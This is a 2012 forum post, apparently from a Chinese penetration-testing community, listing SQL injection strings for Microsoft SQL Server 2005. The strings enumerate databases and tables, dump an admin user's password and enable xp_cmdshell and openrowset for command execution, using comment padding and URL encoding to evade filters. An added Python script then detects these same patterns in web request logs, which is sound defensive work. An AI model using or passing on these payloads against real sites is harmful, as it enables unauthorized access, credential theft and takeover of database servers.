China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: MSsql2005 Injection Statements
Author: admin
Time: 2012-9-13 17:19

CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Table enumeration statement. The somedb part is the database to list; keep incrementing the number 1 shown in red.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Column dump statement: dumps the password field for user='icerover' in the admin table.

CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

MSSQL 2005 does not enable xp_cmdshell by default, and openrowset cannot be used either.
With sa privileges, they can be enabled as follows.

Enable openrowset:

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell:

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

OK, that's all~~ good night
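
For the detection side of the statements above, here is an added example (not part of the original post) that normalizes web request lines, decoding URL escapes and treating /**/ comments as whitespace, and then flags the catalog enumeration and sp_configure patterns the post shows. The rule names, the /news.asp path and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the statements quoted in the post, applied to
# normalized text. Rule names are this example's own labels (assumptions).
RULES = {
    "catalog-enumeration": re.compile(r"\b(sysdatabases|sys\.all_objects)\b"),
    "top-n-cast-subquery": re.compile(r"\bselect top \d+ (isnull\()?cast\("),
    "sp_configure-enable": re.compile(
        r"\bsp_configure '(show advanced options|ad hoc distributed queries"
        r"|xp_cmdshell)'\s*,\s*1\b"),
}

def normalize(raw):
    """Undo the encoding and comment-as-whitespace layers before matching."""
    text = raw
    for _ in range(2):                       # tolerate one level of double encoding
        text = unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # /**/ stands in for spaces
    return re.sub(r"\s+", " ", text).lower().strip()

def classify(raw):
    """Return the sorted names of all rules that match one request line."""
    text = normalize(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Map 1-based line number -> rule hits, leaving out clean lines."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := classify(line))}

# Constructed access-log lines; /news.asp and its parameters are hypothetical.
SAMPLE_LOG = [
    "GET /news.asp?id=12&q=top+1+deals+reconfigure+router",
    "GET /news.asp?id=1/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/"
    "nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases])%3d0--",
    "GET /news.asp?id=1;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--",
    "GET /news.asp?id=1;exec%2520sp_configure%2520'Ad%2520Hoc%2520Distributed"
    "%2520Queries',1;--",
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(lineno, hits)
```

Matching after normalization is what lets a single rule cover the plain, comment-padded and double-encoded forms; the first sample line shows that ordinary words such as "top 1" or "reconfigure" alone do not trigger a hit.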